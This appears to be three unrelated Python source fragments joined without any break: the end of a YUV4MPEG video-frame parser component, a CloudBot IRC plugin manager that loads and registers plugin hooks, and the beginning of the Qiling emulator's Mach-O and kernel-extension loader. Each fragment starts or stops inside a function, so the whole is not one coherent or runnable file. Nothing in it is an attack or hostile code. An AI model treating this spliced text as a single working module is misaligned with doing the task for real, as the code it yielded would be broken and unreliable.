and outputs uncompressed video frame data structures to its "outbox" outbox.
"""
def __init__(self):
"""x.__init__(...) initializes x; see x.__class__.__doc__ for signature"""
super(YUV4MPEGToFrame,self).__init__()
self.remainder = ""
self.shutdownMsg = None
def checkShutdown(self):
"""\
Collects any new shutdown messages arriving at the "control" inbox, and
returns "NOW" if immediate shutdown is required, or "WHENEVER" if the
component can shutdown when it has finished processing pending data.
"""
while self.dataReady("control"):
newMsg = self.recv("control")
if isinstance(newMsg, shutdownMicroprocess):
self.shutdownMsg = newMsg
elif self.shutdownMsg is None and isinstance(newMsg, producerFinished):
self.shutdownMsg = newMsg
if isinstance(self.shutdownMsg, shutdownMicroprocess):
return "NOW"
elif self.shutdownMsg is not None:
return "WHENEVER"
else:
return None
def readline(self):
"""\
Generator.
Read up to the next newline char from the stream of chunks of binary
string data arriving at the "inbox" inbox.
Any excess data is placed into self.remainder ready for the next call
to self.readline or self.readbytes.
Data is only read from the inbox when required. It is not preemptively
fetched.
The read data is placed into self.bytesread
If a shutdown is detected, self.bytesread is set to "" and this
generator immediately returns.
"""
bytes = []
newdata = self.remainder
index = newdata.find("\x0a")
while index==-1:
bytes.append(newdata)
while not self.dataReady("inbox"):
if self.checkShutdown():
self.bytesread=""
return
self.pause()
yield 1
newdata = self.recv("inbox")
index = newdata.find("\x0a")
tail = newdata[:index+1]
self.remainder = newdata[index+1:]
bytes.append(tail)
self.bytesread = "".join(bytes)
return
def readbytes(self,size):
"""\
Generator.
Read the specified number of bytes from the stream of chunks of binary
string data arriving at the "inbox" inbox.
Any excess data is placed into self.remainder ready for the next call
to self.readline or self.readbytes.
Data is only read from the inbox when required. It is not preemptively
fetched.
The read data is placed into self.bytesread
If a shutdown is detected, self.bytesread is set to "" and this
generator immediately returns.
"""
buf = [self.remainder]
bufsize = len(self.remainder)
while bufsize < size:
if self.dataReady("inbox"):
newdata = self.recv("inbox")
buf.append(newdata)
bufsize += len(newdata)
shutdown = self.checkShutdown()
if shutdown == "NOW" or (shutdown and not self.dataReady("inbox") and bufsize<size):
self.bytesread=""
return
if bufsize<size and not self.anyReady():
self.pause()
yield 1
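# bufsize >= size at this point: split the final chunk so that exactly `size`
# bytes are returned and the overshoot is kept in self.remainder for the next
# call to readline/readbytes.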
excess = bufsize-size
if excess:
wanted = buf[:-1]
tail, self.remainder = buf[-1][:-excess], buf[-1][-excess:]
wanted.append(tail)
else:
wanted = buf
self.remainder = ""
self.bytesread = "".join(wanted)
return
def safesend(self, data, boxname):
"""\
Generator.
Sends data out of the named outbox. If the destination is full
(noSpaceInBox exception) then it waits until there is space and retries
until it succeeds.
If a shutdownMicroprocess message is received, returns early.
"""
while 1:
try:
self.send(data, boxname)
return
except noSpaceInBox:
if self.checkShutdown() == "NOW":
return
self.pause()
yield 1
def main(self):
"""Main loop"""
# parse header
for _ in self.readline(): yield _
if self.checkShutdown() == "NOW" or (self.checkShutdown() and self.bytesread==""):
self.send(self.shutdownMsg,"signal")
return
line = self.bytesread
m = re.match("^YUV4MPEG2((?: .\S*)*)\n$", line)
assert(m)
fields = m.groups()[0]
seq_params = parse_seq_tags(fields)
yield 1
while 1:
for _ in self.readline(): yield _
line = self.bytesread
if self.checkShutdown() == "NOW" or (self.checkShutdown() and self.bytesread==""):
break
m = re.match("^FRAME((?: .\S*)*)\n$", line)
assert(m)
fields = m.groups()[0]
frame_params = parse_frame_tags(fields)
ysize = seq_params["size"][0] * seq_params["size"][1]
csize = seq_params["chroma_size"][0] * seq_params["chroma_size"][1]
for _ in self.readbytes(ysize): yield _
import asyncio
import glob
import importlib
import inspect
import logging
import os
import re
import sys
import time
import sqlalchemy
from cloudbot.event import Event
from cloudbot.util import database
logger = logging.getLogger("cloudbot")
logger.setLevel(logging.DEBUG)
ch = logging.StreamHandler(sys.stdout)
ch.setLevel(logging.DEBUG)
formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')
ch.setFormatter(formatter)
logger.addHandler(ch)
def find_hooks(parent, module):
"""
:type parent: Plugin
:type module: object
:rtype: (list[CommandHook], list[RegexHook], list[RawHook], list[SieveHook], list[EventHook], list[PeriodicHook], list[OnStartHook])
"""
# set the loaded flag
module._cloudbot_loaded = True
command = []
regex = []
raw = []
sieve = []
event = []
periodic = []
on_start = []
type_lists = {"command": command, "regex": regex, "msg_raw": raw, "sieve": sieve, "event": event,
"periodic": periodic, "on_start": on_start}
for name, func in module.__dict__.items():
if hasattr(func, "_cloudbot_hook"):
# if it has cloudbot hook
func_hooks = func._cloudbot_hook
for hook_type, func_hook in func_hooks.items():
type_lists[hook_type].append(_hook_name_to_plugin[hook_type](parent, func_hook))
# delete the hook to free memory
del func._cloudbot_hook
return command, regex, raw, sieve, event, periodic, on_start
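# A sketch of what find_hooks consumes (hypothetical plugin module, not part
# of this file): cloudbot's @hook decorators attach a dict to the decorated
# function under _cloudbot_hook, keyed by hook type, which the loop above
# unpacks into the per-type lists.
#
#     from cloudbot import hook
#
#     @hook.command("echo")
#     def echo(text):
#         return text
#
#     # after import: echo._cloudbot_hook == {"command": <command hook object>}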
def find_tables(code):
"""
:type code: object
:rtype: list[sqlalchemy.Table]
"""
tables = []
for name, obj in code.__dict__.items():
if isinstance(obj, sqlalchemy.Table) and obj.metadata == database.metadata:
# if it's a Table, and it's using our metadata, append it to the list
tables.append(obj)
return tables
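# A table a plugin might declare so that find_tables picks it up (sketch; the
# table and column names are made up, but binding to database.metadata is what
# the isinstance/metadata check above looks for):
#
#     from sqlalchemy import Table, Column, String
#     from cloudbot.util import database
#
#     seen_table = Table("seen", database.metadata,
#                        Column("nick", String),
#                        Column("time", String))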
class PluginManager:
"""
PluginManager is the core of CloudBot plugin loading.
PluginManager loads Plugins, and adds their Hooks to easy-access dicts/lists.
Each Plugin represents a file, and loads hooks onto itself using find_hooks.
Plugins are the lowest level of abstraction in this class. There are four different plugin types:
- CommandPlugin is for bot commands
- RawPlugin hooks onto msg_raw lines and is called earlier, for validation purposes
- RegexPlugin loads a regex parameter, and executes on irc lines which match the regex
- SievePlugin is a catch-all sieve, which all other plugins go through before being executed.
:type bot: cloudbot.bot.CloudBot
:type plugins: dict[str, Plugin]
:type commands: dict[str, CommandHook]
:type raw_triggers: dict[str, list[RawHook]]
:type catch_all_triggers: list[RawHook]
:type event_type_hooks: dict[cloudbot.event.EventType, list[EventHook]]
:type regex_hooks: list[(re.__Regex, RegexHook)]
:type sieves: list[SieveHook]
"""
def __init__(self, bot):
"""
Creates a new PluginManager. You generally only need to do this from inside cloudbot.bot.CloudBot
:type bot: cloudbot.bot.CloudBot
"""
self.bot = bot
self.plugins = {}
self.commands = {}
self.raw_triggers = {}
self.catch_all_triggers = []
self.event_type_hooks = {}
self.regex_hooks = []
self.sieves = []
self._hook_waiting_queues = {}
def load_all(self, plugin_dir):
"""
Load a plugin from each *.py file in the given directory.
Won't load any plugins listed in "disabled_plugins".
:type plugin_dir: str
"""
path_list = glob.iglob(os.path.join(plugin_dir, '*.py'))
# Load each plugin in turn (loading is synchronous)
for path in path_list:
self.load_plugin(path)
def load_plugin(self, path):
"""
Loads a plugin from the given path and plugin object, then registers all hooks from that plugin.
Won't load any plugins listed in "disabled_plugins".
:type path: str
"""
file_path = os.path.abspath(path)
file_name = os.path.basename(path)
title = os.path.splitext(file_name)[0]
# if "plugin_loading" in self.bot.config:
# pl = self.bot.config.get("plugin_loading")
#
# if pl.get("use_whitelist", False):
# if title not in pl.get("whitelist", []):
# logger.info('Not loading plugin module "{}": plugin not whitelisted'.format(file_name))
# return
# else:
# if title in pl.get("blacklist", []):
# logger.info('Not loading plugin module "{}": plugin blacklisted'.format(file_name))
# return
# make sure to unload the previously loaded plugin from this path, if it was loaded.
if file_name in self.plugins:
self.unload_plugin(file_path)
module_name = "%s.%s" % (os.path.basename(os.path.dirname(path)), title)
try:
plugin_module = importlib.import_module(module_name)
# if this plugin was loaded before, reload it
if hasattr(plugin_module, "_cloudbot_loaded"):
importlib.reload(plugin_module)
except Exception:
logger.exception("Error loading {}:".format(file_name))
return
# create the plugin
plugin = Plugin(file_path, file_name, title, plugin_module)
# proceed to register hooks
# create database tables
plugin.create_tables(self.bot)
# run on_start hooks
for on_start_hook in plugin.run_on_start:
print(file_name)
success = self.launch(on_start_hook, Event(bot=self.bot, hook=on_start_hook))
if not success:
logger.warning("Not registering hooks from plugin {}: on_start hook errored".format(plugin.title))
# unregister databases
plugin.unregister_tables(self.bot)
return
self.plugins[plugin.file_name] = plugin
for periodic_hook in plugin.periodic:
#self._start_periodic(periodic_hook)
self._log_hook(periodic_hook)
# register commands
for command_hook in plugin.commands:
for alias in command_hook.aliases:
if alias in self.commands:
logger.warning(
"Plugin {} attempted to register command {} which was already registered by {}. "
"Ignoring new assignment.".format(plugin.title, alias, self.commands[alias].plugin.title))
else:
self.commands[alias] = command_hook
self._log_hook(command_hook)
# register raw hooks
for raw_hook in plugin.raw_hooks:
if raw_hook.is_catch_all():
self.catch_all_triggers.append(raw_hook)
else:
for trigger in raw_hook.triggers:
if trigger in self.raw_triggers:
self.raw_triggers[trigger].append(raw_hook)
else:
self.raw_triggers[trigger] = [raw_hook]
self._log_hook(raw_hook)
# register events
for event_hook in plugin.events:
for event_type in event_hook.types:
if event_type in self.event_type_hooks:
self.event_type_hooks[event_type].append(event_hook)
else:
self.event_type_hooks[event_type] = [event_hook]
self._log_hook(event_hook)
# register regexps
for regex_hook in plugin.regexes:
for regex_match in regex_hook.regexes:
self.regex_hooks.append((regex_match, regex_hook))
self._log_hook(regex_hook)
# we don't need this anymore
del plugin.run_on_start
def unload_plugin(self, path):
"""
Unloads the plugin from the given path, unregistering all hooks from the plugin.
Returns True if the plugin was unloaded, False if the plugin wasn't loaded in the first place.
:type path: str
:rtype: bool
"""
file_name = os.path.basename(path)
title = os.path.splitext(file_name)[0]
if "disabled_plugins" in self.bot.config and title in self.bot.config['disabled_plugins']:
# this plugin hasn't been loaded, so no need to unload it
return False
# make sure this plugin is actually loaded
if file_name not in self.plugins:
return False
# get the loaded plugin
plugin = self.plugins[file_name]
# unregister commands
for command_hook in plugin.commands:
for alias in command_hook.aliases:
if alias in self.commands and self.commands[alias] == command_hook:
# we need to make sure that there wasn't a conflict, so we don't delete another plugin's command
del self.commands[alias]
# unregister raw hooks
for raw_hook in plugin.raw_hooks:
if raw_hook.is_catch_all():
self.catch_all_triggers.remove(raw_hook)
else:
for trigger in raw_hook.triggers:
assert trigger in self.raw_triggers # must hold: the hook was registered under this trigger
self.raw_triggers[trigger].remove(raw_hook)
if not self.raw_triggers[trigger]: # if that was the last hook for this trigger
del self.raw_triggers[trigger]
# unregister events
for event_hook in plugin.events:
for event_type in event_hook.types:
assert event_type in self.event_type_hooks # must hold: the hook was registered under this event type
self.event_type_hooks[event_type].remove(event_hook)
if not self.event_type_hooks[event_type]: # if that was the last hook for this event type
del self.event_type_hooks[event_type]
# unregister regexps
for regex_hook in plugin.regexes:
for regex_match in regex_hook.regexes:
self.regex_hooks.remove((regex_match, regex_hook))
# unregister sieves
for sieve_hook in plugin.sieves:
self.sieves.remove(sieve_hook)
# unregister databases
plugin.unregister_tables(self.bot)
# remove last reference to plugin
del self.plugins[plugin.file_name]
if self.bot.config.get("logging", {}).get("show_plugin_loading", True):
logger.info("Unloaded all plugins from {}.py".format(plugin.title))
return True
def _log_hook(self, hook):
"""
Logs registering a given hook
:type hook: Hook
"""
#if self.bot.config.get("logging", {}).get("show_plugin_loading", True):
logger.info("Loaded {}".format(hook))
logger.debug("Loaded {}".format(repr(hook)))
def _prepare_parameters(self, hook, event):
"""
Prepares arguments for the given hook
:type hook: cloudbot.plugin.Hook
:type event: cloudbot.event.Event
:rtype: list
"""
parameters = []
for required_arg in hook.required_args:
if hasattr(event, required_arg):
value = getattr(event, required_arg)
parameters.append(value)
else:
logger.error("Plugin {} asked for invalid argument '{}', cancelling execution!"
.format(hook.description, required_arg))
logger.debug("Valid arguments are: {} ({})".format(dir(event), event))
return None
return parameters
def _execute_hook_threaded(self, hook, event):
"""
:type hook: Hook
:type event: cloudbot.event.Event
"""
event.prepare_threaded()
parameters = self._prepare_parameters(hook, event)
if parameters is None:
return None
try:
return hook.function(*parameters)
finally:
event.close_threaded()
def _execute_hook_sync(self, hook, event):
"""
:type hook: Hook
:type event: cloudbot.event.Event
"""
event.prepare()
parameters = self._prepare_parameters(hook, event)
if parameters is None:
return None
try:
return hook.function(*parameters)
finally:
event.close()
def _execute_hook(self, hook, event):
"""
Runs the specific hook with the given bot and event.
Returns False if the hook errored, True otherwise.
:type hook: cloudbot.plugin.Hook
:type event: cloudbot.event.Event
:rtype: bool
"""
out = self._execute_hook_sync(hook, event)
if out is not None:
if isinstance(out, (list, tuple)):
# if there are multiple items in the response, return them on multiple lines
event.reply(*out)
else:
event.reply(*str(out).split('\n'))
return True
@asyncio.coroutine
def _sieve(self, sieve, event, hook):
"""
:type sieve: cloudbot.plugin.Hook
:type event: cloudbot.event.Event
:type hook: cloudbot.plugin.Hook
:rtype: cloudbot.event.Event
"""
try:
if sieve.threaded:
result = yield from self.bot.loop.run_in_executor(None, sieve.function, self.bot, event, hook)
else:
result = yield from sieve.function(self.bot, event, hook)
except Exception:
logger.exception("Error running sieve {} on {}:".format(sieve.description, hook.description))
return None
else:
return result
def _start_periodic(self, hook):
interval = hook.interval
initial_interval = hook.initial_interval
yield from asyncio.sleep(initial_interval)
while True:
event = Event(bot=self.bot, hook=hook)
yield from self.launch(hook, event)
yield from asyncio.sleep(interval)
def launch(self, hook, event):
"""
Dispatch a given event to a given hook using a given bot object.
Returns False if the hook didn't run successfully, and True if it ran successfully.
:type event: cloudbot.event.Event | cloudbot.event.CommandEvent
:type hook: cloudbot.plugin.Hook | cloudbot.plugin.CommandHook
:rtype: bool
"""
#if hook.type == "command" and hook.auto_help and not event.text and hook.doc is not None:
#event.notice_doc()
#return False
#!/usr/bin/env python3
#
# Cross Platform and Multi Architecture Advanced Binary Emulation Framework
#
import os, plistlib, struct
from .loader import QlLoader
from qiling.exception import *
from qiling.const import *
from .macho_parser.parser import *
from .macho_parser.const import *
from .macho_parser.utils import *
from qiling.os.macos.kernel_api.hook import *
from qiling.os.memory import QlMemoryHeap
from qiling.os.macos.const import *
from qiling.os.macos.task import MachoTask
from qiling.os.macos.kernel_func import FileSystem, map_commpage
from qiling.os.macos.mach_port import MachPort, MachPortManager
from qiling.os.macos.subsystems import MachHostServer, MachTaskServer
from qiling.os.macos.utils import env_dict_to_array, page_align_end
from qiling.os.macos.thread import QlMachoThreadManagement, QlMachoThread
# The commpage is a shared memory region that is mapped at a fixed address
def load_commpage(ql):
if ql.archtype == QL_ARCH.X8664:
COMM_PAGE_START_ADDRESS = X8664_COMM_PAGE_START_ADDRESS
else:
COMM_PAGE_START_ADDRESS = ARM64_COMM_PAGE_START_ADDRESS
ql.mem.write(COMM_PAGE_START_ADDRESS + COMM_PAGE_SIGNATURE, b'\x00')
ql.mem.write(COMM_PAGE_START_ADDRESS + COMM_PAGE_CPU_CAPABILITIES64, b'\x00\x00\x00\x00')
ql.mem.write(COMM_PAGE_START_ADDRESS + COMM_PAGE_UNUSED, b'\x00')
ql.mem.write(COMM_PAGE_START_ADDRESS + COMM_PAGE_VERSION, b'\x0d')
ql.mem.write(COMM_PAGE_START_ADDRESS + COMM_PAGE_CPU_CAPABILITIES, b'\x00\x00\x00\x00')
ql.mem.write(COMM_PAGE_START_ADDRESS + COMM_PAGE_NCPUS, b'\x00')
ql.mem.write(COMM_PAGE_START_ADDRESS + COMM_PAGE_UNUSED0, b'\x00')
ql.mem.write(COMM_PAGE_START_ADDRESS + COMM_PAGE_CACHE_LINESIZE, b'\x00')
ql.mem.write(COMM_PAGE_START_ADDRESS + COMM_PAGE_SCHED_GEN, b'\x00')
ql.mem.write(COMM_PAGE_START_ADDRESS + COMM_PAGE_MEMORY_PRESSURE, b'\x00')
ql.mem.write(COMM_PAGE_START_ADDRESS + COMM_PAGE_SPIN_COUNT, b'\x00')
ql.mem.write(COMM_PAGE_START_ADDRESS + COMM_PAGE_ACTIVE_CPUS, b'\x00')
ql.mem.write(COMM_PAGE_START_ADDRESS + COMM_PAGE_PHYSICAL_CPUS, b'\x00')
ql.mem.write(COMM_PAGE_START_ADDRESS + COMM_PAGE_LOGICAL_CPUS, b'\x00')
ql.mem.write(COMM_PAGE_START_ADDRESS + COMM_PAGE_UNUSED1, b'\x00')
ql.mem.write(COMM_PAGE_START_ADDRESS + COMM_PAGE_MEMORY_SIZE, b'\x00')
ql.mem.write(COMM_PAGE_START_ADDRESS + COMM_PAGE_CPUFAMILY, b'\xec\x5e\x3b\x57')
ql.mem.write(COMM_PAGE_START_ADDRESS + COMM_PAGE_KDEBUG_ENABLE, b'\x00')
ql.mem.write(COMM_PAGE_START_ADDRESS + COMM_PAGE_ATM_DIAGNOSTIC_CONFIG, b'\x00')
ql.mem.write(COMM_PAGE_START_ADDRESS + COMM_PAGE_UNUSED2, b'\x00')
ql.mem.write(COMM_PAGE_START_ADDRESS + COMM_PAGE_TIME_DATA_START, b'\x00')
ql.mem.write(COMM_PAGE_START_ADDRESS + COMM_PAGE_NT_TSC_BASE, b'\x00')
ql.mem.write(COMM_PAGE_START_ADDRESS + COMM_PAGE_NT_SCALE, b'\x00')
ql.mem.write(COMM_PAGE_START_ADDRESS + COMM_PAGE_NT_SHIFT, b'\x00')
ql.mem.write(COMM_PAGE_START_ADDRESS + COMM_PAGE_NT_NS_BASE, b'\x00')
ql.mem.write(COMM_PAGE_START_ADDRESS + COMM_PAGE_NT_GENERATION, b'\x01') # some flag that seems important
ql.mem.write(COMM_PAGE_START_ADDRESS + COMM_PAGE_GTOD_GENERATION, b'\x00')
ql.mem.write(COMM_PAGE_START_ADDRESS + COMM_PAGE_GTOD_NS_BASE, b'\x00')
ql.mem.write(COMM_PAGE_START_ADDRESS + COMM_PAGE_GTOD_SEC_BASE, b'\x00')
ql.mem.write(COMM_PAGE_START_ADDRESS + COMM_PAGE_APPROX_TIME, b'\x00')
ql.mem.write(COMM_PAGE_START_ADDRESS + COMM_PAGE_APPROX_TIME_SUPPORTED, b'\x00')
ql.mem.write(COMM_PAGE_START_ADDRESS + COMM_PAGE_CONT_TIMEBASE, b'\x00')
ql.mem.write(COMM_PAGE_START_ADDRESS + COMM_PAGE_BOOTTIME_USEC, b'\x00')
class QlLoaderMACHO(QlLoader):
# macho x8664 loader
def __init__(self, ql, dyld_path=None):
super(QlLoaderMACHO, self).__init__(ql)
self.dyld_path = dyld_path
self.ql = ql
#FIXME: Demigod needs a better way to handle kext file
if os.path.isdir(self.ql.argv[0]):
basename = os.path.basename(self.ql.argv[0])
self.kext_name = os.path.splitext(basename)[0]
filename = self.ql.argv
self.ql._argv = [self.ql.argv[0] + "/Contents/MacOS/" + self.kext_name]
self.ql._path = self.ql.argv[0]
self.plist = plistlib.load(open(filename[0] + "/Contents/Info.plist", "rb"))
if "IOKitPersonalities" in self.plist:
self.IOKit = True
else:
self.IOKit = False
else:
self.kext_name = None
def run(self):
self.profile = self.ql.profile
stack_address = int(self.profile.get("OS64", "stack_address"), 16)
stack_size = int(self.profile.get("OS64", "stack_size"), 16)
vmmap_trap_address = int(self.profile.get("OS64", "vmmap_trap_address"), 16)
self.heap_address = int(self.profile.get("OS64", "heap_address"), 16)
self.heap_size = int(self.profile.get("OS64", "heap_size"), 16)
self.stack_address = stack_address
self.stack_size = stack_size
if self.ql.code:
self.ql.mem.map(self.ql.os.entry_point, self.ql.os.code_ram_size, info="[shellcode_stack]")
self.ql.os.entry_point = (self.ql.os.entry_point + 0x200000 - 0x1000)
self.ql.mem.write(self.entry_point, self.ql.code)
self.ql.reg.arch_sp = self.ql.os.entry_point
return
self.ql.os.macho_task = MachoTask()
self.ql.os.macho_fs = FileSystem(self.ql)
self.ql.os.macho_mach_port = MachPort(2187)
self.ql.os.macho_port_manager = MachPortManager(self.ql, self.ql.os.macho_mach_port)
self.ql.os.macho_host_server = MachHostServer(self.ql)
self.ql.os.macho_task_server = MachTaskServer(self.ql)
self.envs = env_dict_to_array(self.env)
self.apples = self.ql.os.path.transform_to_relative_path(self.ql.path)
self.ql.os.heap = QlMemoryHeap(self.ql, self.heap_address, self.heap_address + self.heap_size)
# FIXME: Not working due to overlarge mapping, need to fix it
# vm_shared_region_enter(self.ql)
map_commpage(self.ql)
self.ql.os.thread_management = QlMachoThreadManagement(self.ql)
self.ql.os.macho_thread = QlMachoThread(self.ql)
self.ql.os.thread_management.cur_thread = self.ql.os.macho_thread
self.ql.os.macho_vmmap_end = vmmap_trap_address
self.stack_sp = stack_address + stack_size
self.macho_file = MachoParser(self.ql, self.ql.path)
self.is_driver = (self.macho_file.header.file_type == 0xb)
self.loading_file = self.macho_file
self.slide = int(self.profile.get("LOADER", "slide"), 16)
self.dyld_slide = int(self.profile.get("LOADER", "dyld_slide"), 16)
self.string_align = 8
self.ptr_align = 8
self.binary_entry = 0x0
self.proc_entry = 0x0
self.argvs = [self.ql.path]
self.argc = 1
self.using_dyld = False
self.vm_end_addr = 0x0
self.ql.mem.map(self.stack_address, self.stack_size, info="[stack]")
if self.is_driver:
self.loadDriver(self.stack_address)
self.ql.hook_code(hook_kernel_api)
else:
self.loadMacho()
self.stack_address = (int(self.stack_sp))
self.ql.reg.arch_sp = self.stack_address # self.stack_sp
self.init_sp = self.ql.reg.arch_sp
self.ql.os.macho_task.min_offset = page_align_end(self.vm_end_addr, PAGE_SIZE)
def loadDriver(self, stack_addr, loadbase = -1, argv = [], env = {}):
self.import_symbols = {}
PAGE_SIZE = 0x1000
if loadbase < 0:
loadbase = 0xffffff7000000000
self.slide = loadbase
self.load_address = loadbase
cmds = self.macho_file.commands
for cmd in cmds:
if cmd.cmd_id == LC_SEGMENT_64:
self.loadSegment64(cmd, False)
self.kext_size = self.vm_end_addr - loadbase
kernel_path = os.path.join(self.ql.rootfs, "System/Library/Kernels/kernel.development")
self.ql.log.info("Parsing kernel:")
self.kernel = MachoParser(self.ql, kernel_path)
# Create memory for external static symbol jmp code
self.static_addr = self.vm_end_addr
self.static_size = PAGE_SIZE
self.ql.mem.map(self.static_addr, self.static_size, info="[STATIC]")
self.vm_end_addr += PAGE_SIZE
self.ql.log.info("Memory for external static symbol is created at 0x%x with size 0x%x" % (self.static_addr, self.static_size))
self.static_symbols = {}
# Load kernel
self.slide = 0
self.loading_file = self.kernel
kern_cmds = self.kernel.commands
self.kernel_base = None
for cmd in kern_cmds:
if cmd.cmd_id == LC_SEGMENT_64:
if self.kernel_base is None:
self.kernel_base = cmd.vm_address
self.loadSegment64(cmd, False)
self.ql.log.info("Kernel loaded at 0x%x" % self.kernel_base)
# Resolve local relocation
for relocation in self.macho_file.dysymbol_table.locreloc:
seg = None
for segment in self.macho_file.segments:
if relocation.symbolnum in segment.sections_index:
seg = segment
break
current_value, = struct.unpack("<Q", self.ql.mem.read(loadbase + relocation.address, 8))
self.ql.log.debug("Patching relocation (0x%x): from 0x%x, update to segment %s at 0x%x" % (loadbase + relocation.address, current_value, seg.name, loadbase + seg.vm_address))
self.ql.mem.write(loadbase + relocation.address, struct.pack("<Q", current_value + loadbase ))
# Resolve dynamic symbols
kernel_local_symbols_index = self.kernel.dysymbol_table.locsymbol_index
kernel_local_symbols_num = self.kernel.dysymbol_table.locsymbol_num
self.kernel_local_symbols_detail = self.kernel.symbol_table.details(kernel_local_symbols_index, kernel_local_symbols_num, self.kernel.string_table)
for key in self.kernel_local_symbols_detail:
value = self.kernel_local_symbols_detail[key]
self.import_symbols[value["n_value"]] = key.decode('ascii')
kernel_extrn_symbols_index = self.kernel.dysymbol_table.defext_index
kernel_extrn_symbols_num = self.kernel.dysymbol_table.defext_num
self.kernel_extrn_symbols_detail = self.kernel.symbol_table.details(kernel_extrn_symbols_index, kernel_extrn_symbols_num, self.kernel.string_table)
for key in self.kernel_extrn_symbols_detail:
value = self.kernel_extrn_symbols_detail[key]
self.import_symbols[value["n_value"]] = key.decode('ascii')
offset = 0
"""
0: 48 83 ec 08 sub rsp,0x8
4: c7 04 24 af be ad de mov DWORD PTR [rsp],0xdeadbeaf
b: c7 44 24 04 be ba fe mov DWORD PTR [rsp+0x4],0xcafebabe
12: ca
13: c3 ret
"""
for relocation in self.macho_file.dysymbol_table.extreloc:
symbol = self.macho_file.symbol_table.symbols[relocation.symbolnum]
symname = self.macho_file.string_table[symbol.n_strx]
if relocation.length == 2 and relocation.rtype == 2:
if symname not in self.static_symbols:
if symname in self.kernel_local_symbols_detail:
real_addr = self.kernel_local_symbols_detail[symname]["n_value"]
elif b"_" + symname in self.kernel_extrn_symbols_detail:
# some kernel symbols carry an extra leading underscore (e.g. ___MALLOC)
real_addr = self.kernel_extrn_symbols_detail[b"_" + symname]["n_value"]
elif symname in self.kernel_extrn_symbols_detail:
real_addr = self.kernel_extrn_symbols_detail[symname]["n_value"]
else:
self.ql.log.info("Static symbol %s not found" % symname)
continue
self.import_symbols[real_addr] = symname.decode('ascii')
lo_addr = real_addr & 0xffffffff
hi_addr = (real_addr & 0xffffffff00000000) // 0x100000000
jmpcode = b"\x48\x83\xec\x08\xc7\x04\x24" + struct.pack("<I", lo_addr) + b"\xc7\x44\x24\x04" + struct.pack("<I", hi_addr) + b"\xc3"
self.ql.mem.write(self.static_addr + offset, jmpcode)
self.ql.mem.write(loadbase + relocation.address, struct.pack("<I", self.static_addr + offset - (loadbase + relocation.address + 4)))
self.static_symbols[symname] = self.static_addr + offset
offset += len(jmpcode)
else:
self.ql.mem.write(loadbase + relocation.address, struct.pack("<I", self.static_symbols[symname] - (loadbase + relocation.address + 4)))
# ql.log.info("Patching relocation (0x%x): %s at 0x%x" % (loadbase + relocation.address, symname, self.static_symbols[symname]))
continue
if relocation.extern == 0 or relocation.length != 3:
continue
if symname in self.kernel_local_symbols_detail:
# ql.log.debug("Patching relocation (0x%x): %s at 0x%x" % (loadbase + relocation.address, symname, self.kernel_local_symbols_detail[symname]["n_value"]))
self.ql.mem.write(loadbase + relocation.address, struct.pack("<Q", self.kernel_local_symbols_detail[symname]["n_value"]))
elif symname in self.kernel_extrn_symbols_detail:
# ql.log.debug("Patching relocation (0x%x): %s at 0x%x" % (loadbase + relocation.address, symname, self.kernel_extrn_symbols_detail[symname]["n_value"]))
self.ql.mem.write(loadbase + relocation.address, struct.pack("<Q", self.kernel_extrn_symbols_detail[symname]["n_value"]))
else:
self.ql.log.info("Symbol %s not found!" % symname)
# Update resolved symbols in table
self.loadbase = loadbase
index = self.macho_file.dysymbol_table.locsymbol_index
num = self.macho_file.dysymbol_table.locsymbol_num
self.kext_local_symbols = self.macho_file.symbol_table.details(index, num, self.macho_file.string_table)
index = self.macho_file.dysymbol_table.defext_index
num = self.macho_file.dysymbol_table.defext_num
self.kext_extern_symbols = self.macho_file.symbol_table.details(index, num, self.macho_file.string_table)
if self.IOKit is True:
# Get exported vtables
self.vtables = {}
for symbol in self.macho_file.symbol_table.symbols:
if symbol.n_type == 0xf and "__const".ljust(16, "\x00") == self.macho_file.sections[symbol.n_sect].name:
symname = self.macho_file.string_table[symbol.n_strx]
self.ql.log.info("Found vtable of %s at 0x%x" % (symname, loadbase + symbol.n_value))
self.vtables[symname] = loadbase + symbol.n_value
kext = self.plist["IOKitPersonalities"][self.kext_name]["IOClass"]
user = self.plist["IOKitPersonalities"][self.kext_name]["IOUserClientClass"]
self.kext_alloc = None
self.kext_init = None
self.kext_attach = None
self.kext_probe = None
self.kext_detach = None
self.kext_start = None
# No need to detach since we will emulate kext and user together
self.user_alloc = None
self.user_initWithTask = None
self.user_attach = None
self.user_start = None
for relocation in self.macho_file.dysymbol_table.extreloc:
symbol = self.macho_file.symbol_table.symbols[relocation.symbolnum]
symname = self.macho_file.string_table[symbol.n_strx]
if b"externalMethod" in symname:
current_value, = struct.unpack("<Q", self.ql.mem.read(loadbase + relocation.address, 8))
print(symname, hex(relocation.address), hex(current_value))
for symname in self.vtables:
# TODO: Use IDA Pro to dump offset of methods of IOService and IOUserClient objects
if symname.decode().endswith(str(len(kext)) + kext + "9MetaClassE"):
self.kext_alloc, = struct.unpack("<Q", self.ql.mem.read(self.vtables[symname] + 0x98, 8))
elif symname.decode().endswith(str(len(kext)) + kext):
self.kext_init, = struct.unpack("<Q", self.ql.mem.read(self.vtables[symname] + 0x258, 8))
self.kext_attach, = struct.unpack("<Q", self.ql.mem.read(self.vtables[symname] + 0x680, 8))
self.kext_probe, = struct.unpack("<Q", self.ql.mem.read(self.vtables[symname] + 0x5c8, 8))
self.kext_detach, = struct.unpack("<Q", self.ql.mem.read(self.vtables[symname] + 0x688, 8))
self.kext_start, = struct.unpack("<Q", self.ql.mem.read(self.vtables[symname] + 0x5d0, 8))
elif symname.decode().endswith(str(len(user)) + user + "9MetaClassE"):
self.user_alloc, = struct.unpack("<Q", self.ql.mem.read(self.vtables[symname] + 0x98, 8))
elif symname.decode().endswith(str(len(user)) + user):
self.user_initWithTask, = struct.unpack("<Q", self.ql.mem.read(self.vtables[symname] + 0x8f0, 8))
self.user_attach, = struct.unpack("<Q", self.ql.mem.read(self.vtables[symname] + 0x680, 8))
self.user_start, = struct.unpack("<Q", self.ql.mem.read(self.vtables[symname] + 0x5d0, 8))
self.user_externalMethod, = struct.unpack("<Q", self.ql.mem.read(self.vtables[symname] + 0x860, 8))
else:
# from pprint import pprint
# pprint(kext_local_symbols)
if b"__realmain" in self.kext_local_symbols:
realmain = loadbase + self.kext_local_symbols[b"__realmain"]["n_value"]
current_value, = struct.unpack("<Q", self.ql.mem.read(realmain, 8))
self.ql.log.info("Found entry point: 0x%x" % (current_value))
self.kext_start = current_value
else:
self.ql.log.info("Entry point not found")
self.kext_start = None
if b"__antimain" in self.kext_local_symbols:
